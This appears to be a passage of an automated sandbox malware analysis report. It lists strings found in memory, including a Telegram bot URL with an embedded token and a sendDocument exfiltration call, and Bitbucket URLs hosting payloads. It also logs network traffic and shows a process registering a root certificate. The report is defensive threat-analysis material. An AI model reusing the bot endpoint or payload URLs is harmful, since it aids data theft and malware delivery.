              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B623000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229BE000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000227D8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
              Source: xzeheenC.pif, 00000010.00000002.2757407434.000000002B61B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B8E8000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B62B000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7FD000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B591000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B68C000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002BA5F000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000010.00000002.2757407434.000000002B7A4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ED4000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032C31000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032AEA000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B04000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A4D000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032A86000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032B61000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032961000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032D67000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 00000016.00000002.2758412799.0000000032ECC000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022781000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.00000000229ED000.00000004.00000800.00020000.00000000.sdmp, xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.000000002293F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/both
              Source: xzeheenC.pif, 0000001A.00000002.2757842807.0000000022B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgL
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c09f-
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/3fdf6255-c
              Source: spoolsv.COM, 0000000A.00000002.1583110687.00000000007B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
              Source: spoolsv.COM, 0000000A.00000002.1610085610.000000002083D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/dow
              Source: spoolsv.COM, 0000000A.00000002.1610085610.00000000207CB000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.00000000207FD000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1583110687.00000000007EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj
              Source: spoolsv.COM, 0000000A.00000002.1583110687.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj2_
              Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
              Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
              Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
              Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
              Source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
              Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
              Source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1612493392.000000002182E000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1575491690.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1611738122.0000000021698000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.0000000020883000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1703461302.000000000057C000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1745419099.0000000021300000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.8:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 54.231.224.185:443 -> 192.168.2.8:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49716 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49720 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49931 version: TLS 1.2
              Source: Yara matchFile source: Process Memory Space: spoolsv.COM PID: 4896, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Registers a new ROOT certificate
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,7_2_00007FF792D4B684
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF792DC93A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D9342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF792D9342C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF792DC98B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF792D8184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF792D2FC20
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF792D1F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF792D8E1F8
